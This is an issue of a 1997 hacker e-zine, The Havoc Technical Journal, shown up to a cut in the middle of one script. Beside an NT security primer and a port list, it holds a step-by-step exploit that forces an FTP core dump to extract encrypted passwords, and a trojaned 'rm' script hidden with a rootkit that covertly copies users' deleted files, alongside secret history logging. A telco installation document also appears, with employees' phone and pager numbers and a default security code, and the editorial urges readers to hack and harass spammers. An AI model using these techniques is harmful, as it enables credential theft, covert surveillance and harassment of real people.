Copy Link
Add to Bookmark
Report

The Havoc Technical Journal 15

  

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³the havoc technical journal - http://www.thtj.com - ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±

vol. 2 no. 3 issue 15 ³ October 1, 1997 ³ a thtj communications publication
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
-³ the havoc technical journal issue 15 ³-
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Editorial..............................Scud-O
Windows NT Security Education Guide....NeonSurge
Single Access Serving System (SASS)....anonymous
BSDI FTP CORE DUMPS....................Bronc Buster
Security/Monitoring Tools..............Shok
Cryptanalytic Attacks..................The Messiah
Shadow files explained.................Shypht
SMTP server scanner....................memor
About The Internet Protocol............Malhavoc
ShokDial - a linux war dialer..........Shok
Under The Hood of Blowfish.............The Messiah
Learning to Count All Over Again.......Bronc Buster
scan.c.................................memor
Vuls in Solaris 2.5.1..................Shok
Operating Systems......................Fucking Hostile
Hacking your way to DOS................Devix
A phreak's dream come true.............Kode9
Rat Shak Shopping Made Easy............N-TREEG
Telephone Conferencing.................DataThief
How To Make A Cattleprod...............The Messiah
Securing Linux.........................KiDMaGiC
Social Insurance Numbers...............Devix
Stupid Unix Pranks.....................The Darkling
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ the NEW thtj.com ³
³ ÄÄÄÄÄÄÄÄ ³
³ coming soon from thtj communications ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Shouts go out to all my people on the block:
The writers. You're the ones that make thtj run, and it is you that help to
keep the community informed. We owe you.

Other Shouts out go to:
All of #phreak, #hackers, #hackphreak,
#carparts, #linuxos, #phrack, (you all know who you are)

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³the havoc technical journal - contacts³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

- Editor in Chief : Scud-O, scud@thtj.com
- Assistant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- thtj email address: thtj@thtj.com
- thtj website: http://www.thtj.com/
- thtj mailing address: PO BOX 448 Sykesville, MD 21784

The Havoc Technical Journal Vol. 2, No.3, October 1, 1997.
A THTJ Communications publication. Contents Copyright (©)
1997 THTJ Communications. All Rights Reserved. No part of
this publication may be reproduced in whole or in part
without the expressed written consent of the Editor in Chief
of The Havoc Technical Journal. [No copying THTJ, damnit.]

The Havoc Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.

The articles provided in this magazine are without any
expressed or implied warranties. While every effort has been
taken to ensure the accuracy of the information contained in
this article, the authors, editors, and contributors of this
zine assume no responsibility for errors or omissions, or for
damages resulting from the use of the information contained
herein.

For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com ³ mail: THTJ PO Box 448 Sykesville, MD 21784

NOTICE: If you are an official of a government or an employee
of a government, you must register with THTJ before reading
any issue of this publication. A registration form will be
mailed to you free of charge by using either of the mailing
addresses above. Upon reception of this form you will be granted
privelege to read all issues of The Havoc Technical Journal.
Until you have registered, you are not authorized to read this
or any issues of THTJ.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Editorial
by Scud-O

The NEW thtj.

Well, with all great plans, the 'new thtj' that was scheduled for thtj14 is a
month late, and here it is. I hope you enjoy it. I personally think that this
is the best issue yet. This month as some of you know, I was fairly
intoxicated, and seriously looked into giving up thtj. However, thanks to all
of you out there, the staff of thtj communications, HBS, #phreak, the
writers, and the editors, it all came together, and so, here is thtj15,
bigger, badder, and kicking more ass.
This issue also marks a change that you may or may not have noticed.
thtj is now produced by thtj communications, inc. Havoc Bell Systems no
longer publishes thtj, since it seems that so many of you thought that you
had to be in HBS to write for thtj. This is entirely false. Anyone and
everyone is free to write for thtj. HBS is not dying, but we will hopefully
be able to focus more on group stuff, and less about thtj deadlines now that
thtj isn't officially in our hands..
The redesigned thtj.com site is about to be coming at you, with a lot
of new things that will hopefully make your life easier, and *gasp* more
complete. thtj.com is finally going to have a majordomo or two up, have some
e-mail forwarders for instant, easy access to current thtj issues, and
article submission information. The www site is also going to improve. A
bunch of you have said that the site is fairly lynx friendly, but it needs
work. Less graphics and more content are on their way, as are some new cgis,
wwwboards, and redesigned pages for distribution as well as submissions.
Last, but certainly not least, will be the new main page. I am adding site
links and info up top, so that all of you can skip over my rantings in the
message of the day section. I am also hoping to make a forum for everyone to
discuss their issues or problems with the community, so if you would like to
contribute to that, get a hold of me.

Finally this month, before I am done, I would like to talk with you
about some things that need to be done, and somethings I would like to see on
thtj.com. I have found various sources on the net for helping to block and
protect your site and your sendmail from spammers using your site as a
transfer site for their e-mail, to protect their servers from the flames. I
am going to be adding some code for this, and other security info for you,
since if you have a system up, you are just as curious about setting up
system security as you are breaking it up.
The reason I bring this all up is that spam is a serious problem.
Retards like the 'spam king' (who recently had his servers disconnected)
think that we all like having e-mail telling us about stupid products. The
fact that we all know is that no one wants this shit. If you own your own
domain you know about all this. You get hundreds of spam letters offering
'web registering services' and all the trash. We need to stop this, and we
would, or could, but losers like the aformentioned 'spam king' using many
servers to redirect their mail, and not let you know who the mail is from, so
you cannot ask him to stop. Securing your site with the code I talked about
is a step, but go beyond that. Spammers have ruined parts of the net, but not
all of it. Take action, strike back, hack them, harrass them, spam them, make
them learn to go fuck themselves. Well, thank you for the time it took you to
read may rants.

Scud-O , Founder, and Editor in Chief of THTJ

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Scud-O and HBS would like to hear your views on this commentary.
Please feel free to e-mail us at: scud@thtj.com

----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-

scud@thtj.com ³ http://www.thtj.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
The Windows NT Security Education Guide (SEG) Part One
by NeonSurge of Shatter
(neonsurge@hotmail.com)

NT Security components and subsystem

The Logon Process

WinLogon

Users must log on to a Windows NT machine in order to use that NT based
machine or network. The logon process itself cannot be bypassed, it is
mandatory. Once the user has logged on, an access token is created (this
token will be discussed in more detail later). This token contains user
specific security information, such as: security identifier, group
identifiers, user rights and permissions. The user, as well as all processes
spawned by the user are identified to the system with this token.


The first step in the WinLogon process is something we are all familiar with,
CTRL+ALT+DEL. This is NT's default Security Attention Sequence (SAS - The SAS
key combo can be changed. We will also discuss that later.). This SAS is a
signal to the operating system that someone is trying to logon. After the
SAS is triggered, all user mode applications pause until the security
operation completes or is cancelled. (Note: The SAS is not just a logon
operation, this same key combination can be used for logging on, logging off,
changing a password or locking the workstation.) The pausing, or closing, of
all user mode applications during SAS is a security feature that most people
take for granted and dont understand. Due to this pausing of applications,
logon related trojan viruses are stopped, keyloggers (programs that run in
memory, keeping track of keystrokes, therefor recording someones password)
are stopped as well.

The user name is not case sensitive but the password is.

After typing in your information and clicking OK (or pressing enter), the
WinLogon process supplies the information to the security subsystem, which
in turn compares the information to the Security Accounts Manager (SAM). If
the information is compliant with the information in the SAM, an access token
is created for the user. The WinLogon takes the access token and passes it
onto the Win32 subsytem, which in turn starts the operating systems shell.
The shell, as well as all other spawned processes will receive a token. This
token is not only used for security, but also allows NTs auditing and logging
features to track user usage and access of network resources.


Note: All of the logon components are located in a file known as the
Graphical Indetification and Authentication (GINA) module, specifically
MSGINA.DLL. Under certain conditions, this file can be replaced, which is
how you would change the SAS key combination.

For fine tuning of the WinLogon process, you can refer to the registry. All
of the options for the WinLogon process are contained in the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon area.
You can also fine tune the process by using the Policy Editor.


Logging on to a Domain

If an NT machine is a participant on a Domain, you would not only need to
login to the local machine, but the Domain as well. If a computer is a member
of a Domain, the WinLogon process is replaced by the NetLogon process.


Components

Local Security Authority (LSA): Also known as the security subsystem, it is
the central portion of NT security. It handles
local security policies and user
authentication. The LSA also handles
generating and logging audit messages.


Security Accounts Manager (SAM): The SAM handles user and group accounts, and
provides user authentication for the LSA.

Security Reference Monitor (SRM): The SRM is in charge of enforcing and
assuring access validation and auditing for
the LSA. It references user account
information as the user attempts to access
resources.

TCP/IP Security in NT

Note: This section is not meant to teach you the concepts behind the TCP/IP
protocol. It is assumed that a working knowledge of TCP/IP can be applied.


Windows NT has a built in TCP/IP security functionality that most
people do not use or know about. This functionality enables you to
control the types of network traffic that can reach your NT servers.
Access can be allowed or denied based on specific TCP ports, UDP
ports, and IP protocols. This type of security is normally applied to
servers connected directly to the internet, which is not recommended.

Do configure NT's built in TCP/IP security, follow these steps:

1 - Right click on Network Neighborhood and goto the properties
option.

2 - Select the Protocols tab, highlight TCP/IP and click on
Properties.

3 - Select the IP address tab of the TCP/IP properties screen.

4 - Check the check box that reads "Enable Security".

5 - Click on Configure

You should now be looking at the TCP/IP Security dialog, which has
the following options:

-Adapter: Specifies which of the installed network adapter cards you
are configuring
-TCP Ports
-UDP Ports
-IP Protocols

Within these settings, you would choose which ports and what access
permissions you would like to assign to those ports. The following
list is a list of the well known TCP/IP ports. This is not an in
depth guide, just a quick reference (For more details, check RFC 1060).


Service Port Comments

TCP Ports
echo 7/tcp
discard 9/tcp sink null
systat 11/tcp users
daytime 13/tcp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
name 42/tcp nameserver
whois 43/tcp nicname
nameserver 53/tcp domain
apts 57/tcp any private terminal service
apfs 59/tcp any private file service
rje 77/tcp netrjs
finger 79/tcp
http 80/tcp
link 87/tcp ttylink
supdup 95/tcp
newacct 100/tcp [unauthorized use]
hostnames 101/tcp hostname
iso-tsap 102/tcp tsap
x400 103/tcp
x400-snd 104/tcp
csnet-ns 105/tcp CSNET Name Service
pop-2 109/tcp pop postoffice
sunrpc 111/tcp
auth 113/tcp authentication
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet readnews untp
ntp 123/tcp network time protocol
statsrv 133/tcp
profile 136/tcp
NeWS 144/tcp news
print-srv 170/tcp
exec 512/tcp remote process execution;
authentication performed using
passwords and UNIX loppgin names
login 513/tcp remote login a la telnet;
automatic authentication performed
based on priviledged port numbers
and distributed data bases which
identify "authentication domains"
cmd 514/tcp like exec, but automatic
authentication is performed as for
login server
printer 515/tcp spooler
efs 520/tcp extended file name server
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
uucp 540/tcp uucpd
klogin 543/tcp
kshell 544/tcp krcmd
dsf 555/tcp
remotefs 556/tcp rfs server
chshell 562/tcp chcmd
meter 570/tcp demon
pcserver 600/tcp Sun IPC server
nqs 607/tcp nqs
mdqs 666/tcp
rfile 750/tcp
pump 751/tcp
qrh 752/tcp
rrh 753/tcp
tell 754/tcp send
nlogin 758/tcp
con 759/tcp
ns 760/tcp
rxe 761/tcp
quotad 762/tcp
cycleserv 763/tcp
omserv 764/tcp
webster 765/tcp
phonebook 767/tcp phone
vid 769/tcp
rtip 771/tcp
cycleserv2 772/tcp
submit 773/tcp
rpasswd 774/tcp
entomb 775/tcp
wpages 776/tcp
wpgs 780/tcp
mdbs 800/tcp
device 801/tcp
maitrd 997/tcp
busboy 998/tcp
garcon 999/tcp
blackjack 1025/tcp network blackjack
bbn-mmc 1347/tcp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
orasrv 1525/tcp oracle
ingreslock 1524/tcp
issd 1600/tcp
nkd 1650/tcp
dc 2001/tcp
mailbox 2004/tcp
berknet 2005/tcp
invokator 2006/tcp
dectalk 2007/tcp
conf 2008/tcp
news 2009/tcp
search 2010/tcp
raid-cc 2011/tcp raid
ttyinfo 2012/tcp
raid-am 2013/tcp
troff 2014/tcp
cypress 2015/tcp
cypress-stat 2017/tcp
terminaldb 2018/tcp
whosockami 2019/tcp
servexec 2021/tcp
down 2022/tcp
ellpack 2025/tcp
shadowserver 2027/tcp
submitserver 2028/tcp
device2 2030/tcp
blackboard 2032/tcp
glogger 2033/tcp
scoremgr 2034/tcp
imsldoc 2035/tcp
objectmanager 2038/tcp
lam 2040/tcp
interbase 2041/tcp
isis 2042/tcp
rimsl 2044/tcp
dls 2047/tcp
dls-monitor 2048/tcp
shilp 2049/tcp
NSWS 3049/tcp
rfa 4672/tcp remote file access server
complexmain 5000/tcp
complexlink 5001/tcp
padl2sim 5236/tcp
man 9535/tcp


UDP Ports
echo 7/udp
discard 9/udp sink null
systat 11/udp users
daytime 13/udp
netstat 15/udp
qotd 17/udp quote
chargen 19/udp ttytst source
time 37/udp timserver
rlp 39/udp resource
name 42/udp nameserver
whois 43/udp nicname
nameserver 53/udp domain
bootps 67/udp bootp
bootpc 68/udp
tftp 69/udp
sunrpc 111/udp
erpc 121/udp
ntp 123/udp
statsrv 133/udp
profile 136/udp
snmp 161/udp
snmp-trap 162/udp
at-rtmp 201/udp
at-nbp 202/udp
at-3 203/udp
at-echo 204/udp
at-5 205/udp
at-zis 206/udp
at-7 207/udp
at-8 208/udp
biff 512/udp used by mail system to notify users
of new mail received; currently
receives messages only from
processes on the same machine
who 513/udp maintains data bases showing who's
logged in to machines on a local
net and the load average of the
machine
syslog 514/udp
talk 517/udp like tenex link, but across
machine - unfortunately, doesn't
use link protocol (this is actually
just a rendezvous port from which a
tcp connection is established)
ntalk 518/udp
utime 519/udp unixtime
router 520/udp local routing process (on site);
uses variant of Xerox NS routing
information protocol
timed 525/udp timeserver
netwall 533/udp for emergency broadcasts
new-rwho 550/udp new-who
rmonitor 560/udp rmonitord
monitor 561/udp
meter 571/udp udemon
elcsd 704/udp errlog copy/server daemon
loadav 750/udp
vid 769/udp
cadlock 770/udp
notify 773/udp
acmaint_dbd 774/udp
acmaint_trnsd 775/udp
wpages 776/udp
puparp 998/udp
applix 999/udp Applix ac
puprouter 999/udp
cadlock 1000/udp
hermes 1248/udp
wizard 2001/udp curry
globe 2002/udp
emce 2004/udp CCWS mm conf
oracle 2005/udp
raid-cc 2006/udp raid
raid-am 2007/udp
terminaldb 2008/udp
whosockami 2009/udp
pipe_server 2010/udp
servserv 2011/udp
raid-ac 2012/udp
raid-cd 2013/udp
raid-sf 2014/udp
raid-cs 2015/udp
bootserver 2016/udp
bootclient 2017/udp
rellpack 2018/udp
about 2019/udp
xinupagesrver 2020/udp
xinuexpnsion1 2021/udp
xinuexpnsion2 2022/udp
xinuexpnsion3 2023/udp
xinuexpnsion4 2024/udp
xribs 2025/udp
scrabble 2026/udp
isis 2042/udp
isis-bcast 2043/udp
rimsl 2044/udp
cdfunc 2045/udp
sdfunc 2046/udp
dls 2047/udp
shilp 2049/udp
rmontor_scure 5145/udp
xdsxdm 6558/udp
isode-dua 17007/udp




The Nbtstat Command

This tool should be known, because it can give you tons of info about an NT
server. It can be used to query the network concerning netbios information.
It can also be useful for purging the netbios cache and reloading the LMHOSTS
file. This one command can be extremely useful when performing security
audits. When one knows how to interpret the information, it can reveal more
than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s]
[interval]

Switches -a Lists the remote computer's name table given its host
name.

-A Lists the remote computer's name table given its IP
address.

-c Lists the remote name cache including the IP addresses.
Lists the remote name cache including the IP
addresses Lists local NetBIOS names. Lists names
resolved by broadcast and via WINS Purges and reloads
the remote cache name table Lists sessions table with
the destination IP addresses.
Lists sessions table converting destination IP
addresses to host names via the hosts file.

-n Lists local NetBIOS names.

-r Lists names resolved by broadcast and via WINS.

-R Purges and reloads the remote cache name table.

-S Lists sessions table with the destination IP addresses.

-s Lists sessions table converting destination IP
addresses to host names via the hosts file.

interval This will redisplay the selected statistics,
pausing for the number of seconds you choose
as "interval" between each listing.
Press CTRL+C to stop.

Notes on NBTSTAT

The column headings generated by NBTSTAT have the following meanings:

Input
Number of bytes received.

Output
Number of bytes sent.

In/Out
Whether the connection is from the computer (outbound) or from another
system to the local computer (inbound).

Life
The remaining time that a name table cache entry will "live" before your
computer purges it.

Local Name
The local NetBIOS name given to the connection.

Remote Host
The name or IP address of the remote host.

Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something
because the same name can be present multiple times on the same computer.
This shows the last byte of the name converted into hex.

State
Your NetBIOS connections will be shown in one of the following "states":

State Meaning

Accepting An incoming connection is in process.

Associated The endpoint for a connection has been created and
your computer has ssociated it with an IP address.

Connected This is a good state! It means you're connected to the
remote resource.

Connecting Your session is trying to resolve the name-to-IP
address mapping of the destination resource.

Disconnected Your computer requested a disconnect, and it is waiting
for the remote computer to do so.

Disconnecting Your connection is ending.

Idle The remote computer has been opened in the current
session, but is currently not accepting connections.

Inbound An inbound session is trying to connect.

Listening The remote computer is available.

Outbound Your session is creating the TCP connection.

Reconnecting If your connection failed on the first attempt, it will
display this state as it tries to reconnect.

16th Byte character Values for NetBios names

<00> Workstation service name
<03> Messenger service name
<1B> Domain Master Browser name
<06> RAS Server service
<1F> NetDDE service
<20> Server service name
<21> RAS Client
<BE> Network monitor agent
<BF> Network monitor utility
<1C> Domain group name
<1D> Master browser name
<1E> Normal group name
_MSBROWSE_ Domain master browser

The messenger service name <03> will give you the name of any users currently
logged onto that machine, including the administrator account name.


Thats about it for part one. Look out for future releases. Question or
Comments to NeonSurge@hotmail.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Single Access Serving System (SASS)
(anonymous)

PROCESS
DOCUMENTATION


Santa Ana, April 8, 1997

SUBJECT
Single Access Serving System (SASS).

REASON FOR ISSUANCE
This document will provide an EM Communication Technician with installation
procedures for the Single Access Serving System (SASS)

SWITCH TYPES AFFECTED
5ESS, DMS100 and 1AESS

GENERIC/BCS REQUIRED
None

WORK FUNCTIONS AFFECTED
Local Field Operations (LFO) EM Communication Technicians

EFFECTIVE / CRITICAL DATES
Effective immediately.

TRACKING CODE
Baseline

QUESTIONS
Questions regarding this document may be directed to Michele Baker at (714)
430-6640

GENERAL INFORMATION
SASS is a transmission conditioning unit, a printed wiring card that employs
a microprocessor control of test functions and provides voice prompting. The
card is installed in an MFT bay and connected to the switch through an
outgoing trunk. A dedicated POTS line is required for the ringback feature.
This Single Serving Access System will allow both outside field technicians
as well as LFO technicians the ability to perform multiple test functions
using one access number.

The Unit Test Features are:

- ANI
- Single Tone Generation
- Three Tone slope
- Ten Tone Slope
- Full Tone Sweep
- Caller ID Transmission
- Data Sweep
- Quiet Termination
- Keypad Test

CENTRAL OFFICE (CO)
REQUIREMENTS
1. An MFT slot
2. An outgoing trunk OR A D4 port equipped with a DPT Channel Unit.
3. A new Trunk Group assignment will be established
4. The SASS Access Number wil need to be route indexed to the trunk or port
assigned.
5. Assignment and cross connect to a POTS line for ringback capabilities.

CENTRAL OFFICE (CO)
PROCESS (1) Wiring the Circuit
1. You will receive two service orders for your SASS circuit. One for the
design itself (se word) and one for the POTS line (1ML) associated with it.
The POTS order will consist of only an OE assignment used for ringback
capabilities.

NOTE 1) The design portion of your order will resemble a DID circuit.
NOTE 2) Every effort will be made to use a digital trunk assignment,
however, if none are available, an analog trunk will be used in its
place.
NOTE 3) Make sure the channel unit used in the circuit is a D4CD200
(terminating).

CENTRAL OFFICE (CO)
PROCESS (2) Installing and Optioning The Channel Unit
Install the SASS Unit into the designated MFT slot. Once the plug-in has
been installed it should be optioned according to the manufacturers
instructions on the card.

CENTRAL OFFICE (CO)
PROCESS (3) Initial Power-Up Verification
Once the SASS unit is installed and optioned the Initial Power-up
verification must be performed at the unit itself.

CENTRAL OFFICE (CO)
PROCESS (4) Procedure for Setting Transmission Levels
Once the SASS unit has passed the Initial Power-up verification the
Transmission Levels must be set for the unit. The following is the procedure
for setting transmission levels on a newly installed SASS Unit. This
function must be performed at the mainframe to any pair assigned to an OE in
the respective switch in which the SASS unit was installed. The pair must be
open and the reading taken toward the line card.

STEP ACTION
1 At the mainframe, remove the coils from any working pair assigned to an OE
in the respective switch.
2 Draw dial tone on the OE side of the open and dial the SASS access number.
3 Enter the SASS Security Code after the number announcement. The default
Security Code is 222-2222.
4 Press 3 to Read or Change Prefixes
5 Press 5 to Generate Test Tone.
6 Enter * to Generate System Tone
7 Measure Tone with a transmission measurement test set. Should measure a
level of 0dbBRNC.
NOTE 1) Adjustments may be made by; entering a 6 to increase level by 0.1 dB
each time the 6 is depressed, or entering 7 to decrease the level by 0.1 dB
each time the 7 is depressed.
8 When you have completed setting the db levels, hangup to terminate the
call.
9 A test must be performed on least three (3) prefixes to determine whether
the db levels were set correctly in all prefixes.. A deviation of + or
-1/2 db is acceptable. If tests reveal any variance greater than + or -1/2
db, you must repeat the procedure for Setting Tranmission Levels for every
prefix.

CENTRAL OFFICE (CO)
PROCESS (5) Testing The Newly Installed SASS Unit
When the SASS installation is complete, call the Test System Health Group to
test the newly installed unit. They will in turn close the order out with
OCS.

CENTRAL OFFICE (CO)
PROCESS (6) Troubleshooting A Newly Installed SASS Unit
When the SASS installation is complete, the Initial Power-up verification has
been performed, the transmission levels have been set and your circuit is
still not turned up, try the following troubleshooting procedures.

CENTRAL OFFICE (CO)
PROCESS (7) Who To Call When You Have Questons Concerning:

Closing out your order Test System Health Group
SASS Project SASS Project Team
Word order asignments FACS Administrator
Spares PICS
Test coordination Test System Health Group
Translations NTG
This document PP&STM
Trunk Assignments NTG

CONTACT NUMBERS

NTG
- South Trouble Desk (619) 886-1988
- North Trouble Desk (916) xxx-xxxx

PADS
- South (619) 886-1988
- North (916) xxx-xxxx

PICS
- (not provided)

Process, Product & System Technical Management (PP&STM)
- Michele Baker Voice/Voice mail (714) 430-6640
Pager Number (714) 755-8424

Test System Health Group
- (Statewide) Voice (800) 694-4732

SASS Project Team
- Bruce Poole Voice/Voice mail (209) 454-3197
Pager Number (510) 904-7574

REFERENCES
Harris
Dracon Division
Single Access Serving System (SASS)
Transmission Condititoning Unit
Model 24800-300
Service Manual
011-724800-300 (Issue 3 2/94)

Harris (Addendum)
Dracon Division
SASS
Transmission Condititoning Unit
Model 24800-300
Service Manual
011-724209-001 (Issue 5 6/96)

Questions?
At what point will I know that translations are typed in.
At what point does the ntec ask the ess to idle trunk? Before setting levels.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
BSDI FTP CORE DUMPS
by Bronc Buster
(www.showdown.org)
(bbuster@succeed.net)

It was over a year ago that I first reported my findings to BugTraqs,
BSDI, and CERT about the potential security holes with BSDs core dumping
problems. On the day of 3 Sept 97 BSDI finaly released a patch for this
hole, but as most of you know, most SysAdmins don't keep track of patchs
and their release dates because everyone alawys thinks they are immune
to attack.

This hole uses the massive built in feature on BSD systems that they use
to make their Unix version more stable and less prevy to crashing, Core
Dumps. By useing this function to force a core dump after accessing the
password file you will be able to retreve encrypted passwords from the
core dump. This only works on BSDI BSD/OS 2.X and NOT BSD 3.X.

How it works: you FTP in as a legit user, then stop the process and then
kill it forcing a core dump. By forcing the dump after the FTP program
(wu ftpd 2.4 used) has accessed the password file it will dump the stack
and all the information in it to a core dump file owned by that user in
the present working directory. I think the commands for this exploit are
very easy to understand and are self explaintory.



main: {1} % ftp succeed.net // FTP to localhost
Connected to succeed.net.
220 main.succeed.net FTP server
(Version wu-2.4(2) Tue Jan 7 08:37:31 EST 1997)
ready.
Name (succeed.net:bbuster): bbuster // Login as a user
331 Password required for bbuster.
Password:
230 User bbuster logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ^Z // Control Z and suspend it
Suspended
main: {2} % ps // Find PID number of FTP
PID TT STAT TIME COMMAND
23875 p2 Is 0:00.13 -csh (csh)
23967 p2 S+ 0:00.03 telnet localhost
23969 p3 Ss 0:00.10 -csh (csh)
23978 p3 T 0:00.02 ftp succeed.net
23989 p3 R+ 0:00.01 ps
main: {3} % kill -11 23978 // Kill -11 the FTP process
main: {4} % fg // Call FTP back to Foreground
ftp succeed.net
Segmentation fault (core dumped) // Dump the core
main: {5} % strings ftp.core > test // Stings it to a file for reading
main: {6} % cat test // Get the passwords


That's it. This is not the only problem with BSDI BSD/OS systems
and their core dumps, there was the well known write tty core dump
which essentialy did the same thing as this exploit does, but it was
patched much faster.

Over all BDSI BSD/OS, all versions, are one of the most secure Unix
systems on the market today and when an exploit is found for it we
must treat it like gold as BSDI is usualy very fast is fixing them.

Bronc Buster!!!

[EOF]

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Security/Monitoring tools
by Shok
(shok@sekurity.org)

Okay, well........welcome to this thing......by Shok.
What I plan for this to be, is some various utilities that you might think
as of use and what not. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`

and then do:
mkdir /tmp/hist;chmud 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls).
There are two versions of this....I wrote the first one in shell script,
but do to the fact it has to be a+r, I wrote it in C afterwords. Here is
the rm.sh:

#!/bin/sh
# rm.sh -- rm "trojan" by (--==+*~Shok~*+==--)
#
# Email: shok@sekurity.org

if [ $# > 1 ]
then

case $1 in
-i)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;
--interactive)
shift
cp -f $* /tmp/fill &>/dev/null
doexec /bin/rm.bak rm -i $*
;;

-f)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;
--force)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -f $*
;;

-d)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;
--directory)
shift
cp $1/* /tmp/fill &>/dev/null
/bin/rm.bak -d $*
;;

-v)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;
--verbose)
shift
cp -f $* /tmp/fill &>/dev/null
/bin/rm.bak -v $*
;;

-r)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
-R)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;
--recursive)
shift
cp -f $1/* /tmp/fill &>/dev/null
/bin/rm.bak -R $*
;;

-ri)
shift
